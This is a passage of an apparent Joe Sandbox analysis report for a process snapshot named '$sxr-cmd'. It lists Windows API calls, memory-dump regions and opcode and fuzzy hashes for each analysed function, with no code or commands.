                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$FullNamePathwcschr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1464828906-0
                                                                                                                      • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                      • Instruction ID: b8d73753e9bf7b8a4d354222681db4987ea928d4ba8edb1db581a63bf688470d
                                                                                                                      • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                      • Instruction Fuzzy Hash: C531D129A08A5286E7249F15A40007EF761EB49FA8F659636DA5EC33F1DF7DEC458300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154F8798), ref: 00007FF615504AD6
                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154F8798), ref: 00007FF615504AEF
                                                                                                                        • Part of subcall function 00007FF615504A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6155049F1), ref: 00007FF615504A28
                                                                                                                        • Part of subcall function 00007FF615504A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6155049F1), ref: 00007FF615504A66
                                                                                                                        • Part of subcall function 00007FF615504A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6155049F1), ref: 00007FF615504A7D
                                                                                                                        • Part of subcall function 00007FF615504A14: memmove.MSVCRT(?,?,00000000,00007FF6155049F1), ref: 00007FF615504A9A
                                                                                                                        • Part of subcall function 00007FF615504A14: RtlFreeHeap.NTDLL(?,?,00000000,00007FF6155049F1), ref: 00007FF615504AA2
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154F8798), ref: 00007FF61550EE64
                                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,00007FF6154F8798), ref: 00007FF61550EE78
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$Free$AllocAllocateEnvironmentStringsmemmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3193623387-0
                                                                                                                      • Opcode ID: 573339bfc65e46a6dc0536e612d39ff43a234acebcc174d4b54bf8b687b66270
                                                                                                                      • Instruction ID: b5b3ca44af3574071aaaeae2f066e366963a1983f60bf04248fe2802cea198e7
                                                                                                                      • Opcode Fuzzy Hash: 573339bfc65e46a6dc0536e612d39ff43a234acebcc174d4b54bf8b687b66270
                                                                                                                      • Instruction Fuzzy Hash: 7FF0E769A19E42CAEE189B669404178E9D1EF8EF65B4D9434C90EC23A1EF3CA9448710
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset
                                                                                                                      • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                                      • API String ID: 2221118986-3416068913
                                                                                                                      • Opcode ID: c44a4f921b2871da75a6341d1782bc5e11e8903ade1904c719f7b607e4e2203c
                                                                                                                      • Instruction ID: 9c76e00c71eec368a665d3ac37612da98e7980b5a6d24d6966a5716322f817ba
                                                                                                                      • Opcode Fuzzy Hash: c44a4f921b2871da75a6341d1782bc5e11e8903ade1904c719f7b607e4e2203c
                                                                                                                      • Instruction Fuzzy Hash: 19117025A18F4681EB54CB69E1542B9A2A09F85FB4F184232DA6DCB7F5DF3CE8908314
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: memsetwcschr
• String ID: 2$COMSPEC
• API String ID: 1764819092-1738800741
• Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
• Instruction ID: 27cc8f6fc7557881489dccf90d9a02b23547ebfdcce0909de8a7a8673c62a509
• Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
• Instruction Fuzzy Hash: C2516D25A08E4285FB649B2DA4513B9A395AF46FA4F084033DA4EC66F9DF3CEC648741
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: wcschr$ErrorFileFindFirstLastwcsrchr
• String ID:
• API String ID: 4254246844-0
• Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
• Instruction ID: ec1127bf8386acc7cf0529950c417b0d68c0e4bfdc93b57ef294f9b8d612865c
• Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
• Instruction Fuzzy Hash: 01418229A09F4286EE608B10E45537AE7A0EF85FA8F554532DA4EC77E5EF3CF8458700
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$EnvironmentFreeProcessVariable
• String ID:
• API String ID: 2643372051-0
• Opcode ID: 515bd75455fc8bf0b419e36a5d89a3138a905a51cbad146b731857f3ffb38bca
• Instruction ID: 28036bd79603fab6276f7459ebf30f5d04f7809509e0b239c05d19bc491cabe1
• Opcode Fuzzy Hash: 515bd75455fc8bf0b419e36a5d89a3138a905a51cbad146b731857f3ffb38bca
• Instruction Fuzzy Hash: 34F08166A19F42C6EB409B75F404075EAE1FF9DFB0B4A9235C92E833B1DF3C98448640
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: _get_osfhandle$ConsoleMode
• String ID:
• API String ID: 1591002910-0
• Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
• Instruction ID: 899d9afaafdd2ec3e0e30c465bc47621afe5f0b35e7d91df0a4c0575b6054e75
• Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
• Instruction Fuzzy Hash: 75F07439A09E02CBE644CB24E845078BBB0FB8AF31F564174C90E83331DF3CA8158B40
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: DriveType
• String ID: :
• API String ID: 338552980-336475711
• Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
• Instruction ID: 06dbba96bafd741e61008b67e2f7b571703fc0a93dabe7a4228583d50effa83e
• Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
• Instruction Fuzzy Hash: F7E06D6A618A40C6EB209B60E45106AF7A0FB8DB58FC51525EA8DC3734EF3CD249CB08
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907026637.0000020D0B5F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000020D0B5F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b5f0000_$sxr-cmd.jbxd
Similarity
• API ID: AllocLibraryLoadVirtual
• String ID:
• API String ID: 3550616410-0
• Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
• Instruction ID: 12bc5f3573c2f4db11740c667e5c07846b01db0bf613c7666455f812f9685a17
• Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
• Instruction Fuzzy Hash: 5B6106B270A75287EB54CF96D858769F7A2FB04BA4F448415EF0D07BC6EA39D852C700
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF6154FCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154FB9A1,?,?,?,?,00007FF6154FD81A), ref: 00007FF6154FCDA6
  • Part of subcall function 00007FF6154FCD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF6154FB9A1,?,?,?,?,00007FF6154FD81A), ref: 00007FF6154FCDBD
• GetConsoleTitleW.KERNELBASE ref: 00007FF615505B52
  • Part of subcall function 00007FF615504224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF615504297
  • Part of subcall function 00007FF615504224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6155042D7
  • Part of subcall function 00007FF615504224: memset.MSVCRT ref: 00007FF6155042FD
  • Part of subcall function 00007FF615504224: memset.MSVCRT ref: 00007FF615504368
  • Part of subcall function 00007FF615504224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF615504380
  • Part of subcall function 00007FF615504224: wcsrchr.MSVCRT ref: 00007FF6155043E6
  • Part of subcall function 00007FF615504224: lstrcmpW.KERNELBASE ref: 00007FF615504401
• GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF615505BC7
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocateInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
• String ID:
• API String ID: 346765439-0
• Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
• Instruction ID: 68f5a1a2122e288337c378cc89e3f927a81cc66a7e194ef3547712bcb401f86d
• Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
• Instruction Fuzzy Hash: 34318224B1DE4282FA24A725A45157DE291BF89FA8F545032E94EC7BA6DF3CED028700
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: EnvironmentStrings$Free
• String ID:
• API String ID: 3328510275-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: FileHandleType
• String ID:
• API String ID: 3000768030-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindClose.KERNELBASE(?,?,?,00007FF61551EAC5,?,?,?,00007FF61551E925,?,?,?,?,00007FF6154FB9B1), ref: 00007FF615503A56
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: Concurrency::cancel_current_taskmalloc
• String ID:
• API String ID: 1412018758-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154FB9A1,?,?,?,?,00007FF6154FD81A), ref: 00007FF6154FCDA6
• RtlAllocateHeap.NTDLL(?,?,?,00007FF6154FB9A1,?,?,?,?,00007FF6154FD81A), ref: 00007FF6154FCDBD
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetUserDefaultLangID.KERNELBASE(?,?,?,?,00007FF6154F6F97), ref: 00007FF61550550C
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: DefaultLangUser
• String ID:
• API String ID: 768647712-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615517F44
• _get_osfhandle.MSVCRT ref: 00007FF615517F5C
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615517F9E
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615517FFF
• ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615518020
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615518036
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615518061
• RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615518075
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6155180D6
• RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6155180EA
• _wcsnicmp.MSVCRT ref: 00007FF615518177
• _wcsnicmp.MSVCRT ref: 00007FF61551819A
• _wcsnicmp.MSVCRT ref: 00007FF6155181BD
• _wcsnicmp.MSVCRT ref: 00007FF6155181DC
• _wcsnicmp.MSVCRT ref: 00007FF6155181FB
• _wcsnicmp.MSVCRT ref: 00007FF61551821A
• _wcsnicmp.MSVCRT ref: 00007FF615518239
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615518291
• SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6155182D7
• FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6155182FB
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF61551831A
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615518364
                                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615518378
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF61551839A
                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6155183AE
                                                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6155183E6
                                                                                                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615518403
                                                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615518418
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
